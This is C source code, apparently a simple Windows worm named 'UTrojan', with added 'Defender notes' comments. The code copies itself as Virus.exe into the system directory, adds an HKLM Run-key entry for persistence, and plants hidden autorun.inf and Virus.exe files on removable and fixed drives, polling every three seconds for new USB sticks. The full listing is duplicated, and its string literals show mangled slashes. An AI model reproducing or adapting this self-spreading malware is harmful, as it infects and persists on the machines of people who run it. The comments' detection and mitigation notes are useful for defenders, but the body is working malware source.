#include "stdafx.h"
#include <stdio.h>
#include <windows.h>
HANDLE hMutex;// handle of the named mutex created in WinMain (original comment read "semaphore handle")
DWORD WINAPI infect(LPVOID lpParam);// infect: thread routine that rewrites files on removable drives
void Install(void); // install: copy into the system directory and register an auto-start value
void InfectOtherDisk();// infect other disks: copy onto fixed drives
char ExeFile[MAX_PATH]; // full path of the running image; filled by GetModuleFileName in WinMain
//==========================================================================
// Install: persistence routine; WinMain calls it when the program was started from a removable drive.
// Takes no arguments and returns nothing; reads the global ExeFile (path of the running image).
// Visible behaviour, in order: copy the running image into the system directory as Virus.exe,
// store that path in an auto-start value named "UTrojan" under an HKLM ...CurrentVersion Run key,
// then start explorer so the user still gets a folder window.
// Defender notes: the host artifacts are the Virus.exe file in the system directory and the
// "UTrojan" Run value. Both are machine-wide locations that typically need an elevated token to
// write, and none of the copy/registry return values are checked, so a failure is silent.
// NOTE(review): string literals on this page show '/' where Windows paths and C escapes use a
// backslash, presumably an extraction artifact -- do not match on these literals verbatim.
void Install(void)
{
char FilePath[255]={0}; // path buffer; reused further down as scratch space
char Explorer[12]="explorer "; // command-line prefix later handed to CreateProcess
HKEY AutoStart;
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
// Nothing is installed if the system directory cannot be resolved.
if(GetSystemDirectory(FilePath,254) == 0)
{
return;
}
strcat(FilePath, "//Virus.exe");
// Third argument true = fail if the target exists, so an existing copy is left as it is.
CopyFile(ExeFile, FilePath, true);
// Auto-start registration: the value written below points at the copy made above.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE//Microsoft//Windows//CurrentVersion//Run",
0, KEY_ALL_ACCESS, &AutoStart);
RegSetValueEx(AutoStart, // subkey handle
"UTrojan", // value name
0, // must be zero
REG_SZ, // value type
(LPBYTE) FilePath, // pointer to value data
strlen(FilePath) + 1); // length of value data
RegCloseKey(AutoStart);
strcpy(FilePath,ExeFile); //now use FilePath[] as temp
// NOTE(review): presumably meant to keep only the drive root of ExeFile -- confirm against an original listing.
FilePath[3]='/0';
strcat(Explorer,FilePath);
// Decoy step: per the original comment, the drive is opened in explorer "as usual".
CreateProcess( NULL, //open the directory of U-stick as usual
Explorer,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi );
return;
}
//==========================================================================
// infect: thread entry point (WinMain passes it to CreateThread); lpParam is not used.
// Loops forever. Every 3 seconds it lists the logical drives and, for each one reported as
// DRIVE_REMOVABLE, replaces <root>Virus.exe with a copy of the running image and rewrites
// <root>autorun.inf with entries that reference Virus.exe. Both files are then marked
// Archive|Hidden|System. The trailing "return 0" is never reached.
// Defender notes: a hidden+system autorun.inf next to a hidden+system executable in the root of
// removable media is the on-disk signature of this routine. Disabling AutoRun for removable
// drives (e.g. through the NoDriveTypeAutoRun policy) removes the execution path, and showing
// protected operating system files in Explorer makes both files visible.
DWORD WINAPI infect(LPVOID lpParam)
{
char Drives[255]; // receives the drive-string list
int DriveType;
char *pDrive=0; // cursor into Drives
char FilePath[25]; // drive root plus a short file name
FILE *AutoRun;
while(true)
{
// Reset all per-pass state before re-reading the drive list.
memset(Drives,0,255);
memset(FilePath,0,25);
pDrive=Drives;
DriveType=0;
AutoRun=NULL;
GetLogicalDriveStrings(254,Drives);
// An empty string marks the end of the list.
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
// Only removable media are touched here; everything else is skipped.
if(DriveType!=DRIVE_REMOVABLE)
{
pDrive+=4; // assumes each entry is 4 bytes (a three-character root plus NUL)
continue;
}
strcpy(FilePath,pDrive);
strcat(FilePath,"Virus.exe");
// Clear attributes and delete any previous copy, then copy again (false = overwrite allowed).
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
CopyFile(ExeFile, FilePath, false);
// Hidden+System keeps the file out of a default Explorer view.
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
strcpy(FilePath,pDrive);
strcat(FilePath,"autorun.inf");
// Same sequence for autorun.inf: clear attributes, delete, recreate.
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
AutoRun=fopen(FilePath,"w+");
if(AutoRun!=NULL)
{
// An [AutoRun] section whose open, shellexecute and shell command entries all name Virus.exe.
fputs("[AutoRun]/n",AutoRun);
fputs("open=Virus.exe/n",AutoRun);
fputs("shellexecute=Virus.exe/n",AutoRun);
fputs("shell//Auto//command=Virus.exe",AutoRun);
}
fclose(AutoRun);
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4;
}
Sleep(3000); //poll every 3 s for an attached USB stick
}
return 0;
}
//==========================================================================
// InfectOtherDisk: a single pass over the logical-drive list; no arguments, no return value.
// For each leading entry reported as DRIVE_FIXED it copies the running image (ExeFile) to
// <root>Virus.exe and a file named autorun.inf to <root>autorun.inf, then marks both
// Archive|Hidden|System. The walk ends at the first entry that is not DRIVE_FIXED.
// Defender notes: the artifacts are the same file pair as on removable media, here in the root
// of fixed volumes; an autorun.inf in a fixed-drive root is unusual enough to be worth alerting on.
void InfectOtherDisk(void)
{
char Drives[255]; // receives the drive-string list
int DriveType;
char *pDrive=0; // cursor into Drives
char AppFilePath[25]; // <root>Virus.exe
char InfFilePath[25]; // <root>autorun.inf
memset(Drives,0,255);
memset(AppFilePath,0,25);
memset(InfFilePath,0,25);
pDrive=Drives;
DriveType=0;
GetLogicalDriveStrings(254,Drives);
// An empty string marks the end of the list.
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
if(DriveType==DRIVE_FIXED)
{
strcpy(AppFilePath,pDrive);
strcpy(InfFilePath,pDrive);
strcat(AppFilePath,"Virus.exe");
strcat(InfFilePath,"autorun.inf");
// true = fail if the target exists, so existing files are not overwritten.
CopyFile(ExeFile,AppFilePath, true);
SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
// The source is a relative name, so it is resolved against the current directory.
CopyFile("autorun.inf",InfFilePath,true);
SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4; // assumes each entry is 4 bytes (a three-character root plus NUL)
}
else
{
break;
}
}
}
//==========================================================================
// WinMain: program entry point; none of the four WinMain parameters is used.
// Stores the path of the running image in ExeFile, creates a named mutex "UTrojan", then
// branches on GetDriveType(NULL), which is documented to describe the root of the current directory:
//   DRIVE_REMOVABLE -> Install() and InfectOtherDisk(), then release the mutex;
//   DRIVE_FIXED     -> InfectOtherDisk(), then pass infect() to CreateThread;
//   anything else   -> no action.
// Every path returns 0.
// Defender notes: the named mutex "UTrojan" is a host artifact visible in a live handle listing;
// the Run value written by Install() carries the same name.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
int DriveType;
GetModuleFileName(NULL,ExeFile,MAX_PATH);// get the path of this program
// Exit quietly if the mutex cannot be created.
if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL)
{
return 0;
}
DriveType=GetDriveType(NULL);
// Started from removable media: install on the host and copy to fixed drives.
if(DriveType==DRIVE_REMOVABLE)
{
Install();
InfectOtherDisk();
ReleaseMutex(hMutex);
return 0;
}
// Started from a fixed drive: copy to fixed drives and hand infect() to a new thread.
else if (DriveType==DRIVE_FIXED)
{
InfectOtherDisk();
CreateThread(NULL,NULL,infect,NULL,NULL,NULL);
return 0;
}
else
{
return 0;
}
}
#include <stdio.h>
#include <windows.h>
HANDLE hMutex;// handle of the named mutex created in WinMain (original comment read "semaphore handle")
DWORD WINAPI infect(LPVOID lpParam);// infect: thread routine that rewrites files on removable drives
void Install(void); // install: copy into the system directory and register an auto-start value
void InfectOtherDisk();// infect other disks: copy onto fixed drives
char ExeFile[MAX_PATH]; // full path of the running image; filled by GetModuleFileName in WinMain
//==========================================================================
// Install: persistence routine; WinMain calls it when the program was started from a removable drive.
// Takes no arguments and returns nothing; reads the global ExeFile (path of the running image).
// Visible behaviour, in order: copy the running image into the system directory as Virus.exe,
// store that path in an auto-start value named "UTrojan" under an HKLM ...CurrentVersion Run key,
// then start explorer so the user still gets a folder window.
// Defender notes: the host artifacts are the Virus.exe file in the system directory and the
// "UTrojan" Run value. Both are machine-wide locations that typically need an elevated token to
// write, and none of the copy/registry return values are checked, so a failure is silent.
// NOTE(review): string literals on this page show '/' where Windows paths and C escapes use a
// backslash, presumably an extraction artifact -- do not match on these literals verbatim.
void Install(void)
{
char FilePath[255]={0}; // path buffer; reused further down as scratch space
char Explorer[12]="explorer "; // command-line prefix later handed to CreateProcess
HKEY AutoStart;
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
// Nothing is installed if the system directory cannot be resolved.
if(GetSystemDirectory(FilePath,254) == 0)
{
return;
}
strcat(FilePath, "//Virus.exe");
// Third argument true = fail if the target exists, so an existing copy is left as it is.
CopyFile(ExeFile, FilePath, true);
// Auto-start registration: the value written below points at the copy made above.
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE//Microsoft//Windows//CurrentVersion//Run",
0, KEY_ALL_ACCESS, &AutoStart);
RegSetValueEx(AutoStart, // subkey handle
"UTrojan", // value name
0, // must be zero
REG_SZ, // value type
(LPBYTE) FilePath, // pointer to value data
strlen(FilePath) + 1); // length of value data
RegCloseKey(AutoStart);
strcpy(FilePath,ExeFile); //now use FilePath[] as temp
// NOTE(review): presumably meant to keep only the drive root of ExeFile -- confirm against an original listing.
FilePath[3]='/0';
strcat(Explorer,FilePath);
// Decoy step: per the original comment, the drive is opened in explorer "as usual".
CreateProcess( NULL, //open the directory of U-stick as usual
Explorer,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi );
return;
}
//==========================================================================
// infect: thread entry point (WinMain passes it to CreateThread); lpParam is not used.
// Loops forever. Every 3 seconds it lists the logical drives and, for each one reported as
// DRIVE_REMOVABLE, replaces <root>Virus.exe with a copy of the running image and rewrites
// <root>autorun.inf with entries that reference Virus.exe. Both files are then marked
// Archive|Hidden|System. The trailing "return 0" is never reached.
// Defender notes: a hidden+system autorun.inf next to a hidden+system executable in the root of
// removable media is the on-disk signature of this routine. Disabling AutoRun for removable
// drives (e.g. through the NoDriveTypeAutoRun policy) removes the execution path, and showing
// protected operating system files in Explorer makes both files visible.
DWORD WINAPI infect(LPVOID lpParam)
{
char Drives[255]; // receives the drive-string list
int DriveType;
char *pDrive=0; // cursor into Drives
char FilePath[25]; // drive root plus a short file name
FILE *AutoRun;
while(true)
{
// Reset all per-pass state before re-reading the drive list.
memset(Drives,0,255);
memset(FilePath,0,25);
pDrive=Drives;
DriveType=0;
AutoRun=NULL;
GetLogicalDriveStrings(254,Drives);
// An empty string marks the end of the list.
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
// Only removable media are touched here; everything else is skipped.
if(DriveType!=DRIVE_REMOVABLE)
{
pDrive+=4; // assumes each entry is 4 bytes (a three-character root plus NUL)
continue;
}
strcpy(FilePath,pDrive);
strcat(FilePath,"Virus.exe");
// Clear attributes and delete any previous copy, then copy again (false = overwrite allowed).
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
CopyFile(ExeFile, FilePath, false);
// Hidden+System keeps the file out of a default Explorer view.
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
strcpy(FilePath,pDrive);
strcat(FilePath,"autorun.inf");
// Same sequence for autorun.inf: clear attributes, delete, recreate.
SetFileAttributes(FilePath,FILE_ATTRIBUTE_NORMAL);
DeleteFile(FilePath);
AutoRun=fopen(FilePath,"w+");
if(AutoRun!=NULL)
{
// An [AutoRun] section whose open, shellexecute and shell command entries all name Virus.exe.
fputs("[AutoRun]/n",AutoRun);
fputs("open=Virus.exe/n",AutoRun);
fputs("shellexecute=Virus.exe/n",AutoRun);
fputs("shell//Auto//command=Virus.exe",AutoRun);
}
fclose(AutoRun);
SetFileAttributes(FilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4;
}
Sleep(3000); //poll every 3 s for an attached USB stick
}
return 0;
}
//==========================================================================
// InfectOtherDisk: a single pass over the logical-drive list; no arguments, no return value.
// For each leading entry reported as DRIVE_FIXED it copies the running image (ExeFile) to
// <root>Virus.exe and a file named autorun.inf to <root>autorun.inf, then marks both
// Archive|Hidden|System. The walk ends at the first entry that is not DRIVE_FIXED.
// Defender notes: the artifacts are the same file pair as on removable media, here in the root
// of fixed volumes; an autorun.inf in a fixed-drive root is unusual enough to be worth alerting on.
void InfectOtherDisk(void)
{
char Drives[255]; // receives the drive-string list
int DriveType;
char *pDrive=0; // cursor into Drives
char AppFilePath[25]; // <root>Virus.exe
char InfFilePath[25]; // <root>autorun.inf
memset(Drives,0,255);
memset(AppFilePath,0,25);
memset(InfFilePath,0,25);
pDrive=Drives;
DriveType=0;
GetLogicalDriveStrings(254,Drives);
// An empty string marks the end of the list.
while(pDrive[0]!=NULL)
{
DriveType=GetDriveType(pDrive);
if(DriveType==DRIVE_FIXED)
{
strcpy(AppFilePath,pDrive);
strcpy(InfFilePath,pDrive);
strcat(AppFilePath,"Virus.exe");
strcat(InfFilePath,"autorun.inf");
// true = fail if the target exists, so existing files are not overwritten.
CopyFile(ExeFile,AppFilePath, true);
SetFileAttributes(AppFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
// The source is a relative name, so it is resolved against the current directory.
CopyFile("autorun.inf",InfFilePath,true);
SetFileAttributes(InfFilePath,FILE_ATTRIBUTE_ARCHIVE|FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
pDrive+=4; // assumes each entry is 4 bytes (a three-character root plus NUL)
}
else
{
break;
}
}
}
//==========================================================================
// WinMain: program entry point; none of the four WinMain parameters is used.
// Stores the path of the running image in ExeFile, creates a named mutex "UTrojan", then
// branches on GetDriveType(NULL), which is documented to describe the root of the current directory:
//   DRIVE_REMOVABLE -> Install() and InfectOtherDisk(), then release the mutex;
//   DRIVE_FIXED     -> InfectOtherDisk(), then pass infect() to CreateThread;
//   anything else   -> no action.
// Every path returns 0.
// Defender notes: the named mutex "UTrojan" is a host artifact visible in a live handle listing;
// the Run value written by Install() carries the same name.
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
// TODO: Place code here.
int DriveType;
GetModuleFileName(NULL,ExeFile,MAX_PATH);// get the path of this program
// Exit quietly if the mutex cannot be created.
if((hMutex=CreateMutex(NULL,true,"UTrojan"))==NULL)
{
return 0;
}
DriveType=GetDriveType(NULL);
// Started from removable media: install on the host and copy to fixed drives.
if(DriveType==DRIVE_REMOVABLE)
{
Install();
InfectOtherDisk();
ReleaseMutex(hMutex);
return 0;
}
// Started from a fixed drive: copy to fixed drives and hand infect() to a new thread.
else if (DriveType==DRIVE_FIXED)
{
InfectOtherDisk();
CreateThread(NULL,NULL,infect,NULL,NULL,NULL);
return 0;
}
else
{
return 0;
}
}